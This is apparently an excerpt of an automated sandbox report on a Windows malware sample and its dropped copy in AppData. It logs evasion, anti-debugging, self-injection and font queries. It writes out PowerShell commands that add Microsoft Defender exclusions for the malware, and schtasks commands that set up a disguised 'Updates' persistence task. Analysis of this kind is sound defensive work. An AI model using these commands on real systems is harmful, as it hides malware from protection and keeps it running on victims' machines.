                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Memory allocated: 11E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Memory allocated: 2B60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Memory allocated: 4B60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Memory allocated: 7650000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Memory allocated: 8650000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Memory allocated: 87F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Memory allocated: 97F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 18_2_004186FE
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7656
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2003
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7302
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2394
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Window / User API: threadDelayed 7316
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Window / User API: threadDelayed 2676
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  API coverage: 5.2 %
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7432  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920  Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7960  Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984  Thread sleep count: 7316 > 30
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984  Thread sleep time: -21948000s >= -30000s
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984  Thread sleep count: 2676 > 30
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984  Thread sleep time: -8028000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe TID: 8036  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
                  Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 18_2_0041A01B
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 18_2_0040B28E
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 18_2_0040838E
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 18_2_004087A0
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 18_2_00407848
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_004068CD FindFirstFileW,FindNextFileW, 18_2_004068CD
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 18_2_0040AA71
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 18_2_00417AAB
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 18_2_0040AC78
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 18_2_00406D28
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Thread delayed: delay time: 922337203685477
                  Source: PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWX
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180646269.00000000012C7000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180646269.00000000012C7000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW,
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_004327AE
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 18_2_0041A8DA
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_004407B5 mov eax, dword ptr fs:[00000030h]  18_2_004407B5
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 18_2_00410763
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004327AE
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004328FC SetUnhandledExceptionFilter,18_2_004328FC
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004398AC
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00432D5C
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Memory written: C:\Users\user\Desktop\PEbZthAqV9.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 18_2_00410B5C
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: 18_2_004175E1 mouse_event,18_2_004175E1
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Process created: C:\Users\user\Desktop\PEbZthAqV9.exe "C:\Users\user\Desktop\PEbZthAqV9.exe"
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Process created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Process created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Process created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Process created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Process created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerc
Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managert
Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: 18_2_004329DA cpuid 18_2_004329DA
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: EnumSystemLocalesW,18_2_0044F17B
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: EnumSystemLocalesW,18_2_0044F130
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: EnumSystemLocalesW,18_2_0044F216
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_0044F2A3
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetLocaleInfoA,18_2_0040E2BB
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetLocaleInfoW,18_2_0044F4F3
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_0044F61C
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetLocaleInfoW,18_2_0044F723
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_0044F7F0
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: EnumSystemLocalesW,18_2_00445914
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: GetLocaleInfoW,18_2_00445E1C
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_0044EEB8
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Users\user\Desktop\PEbZthAqV9.exe VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
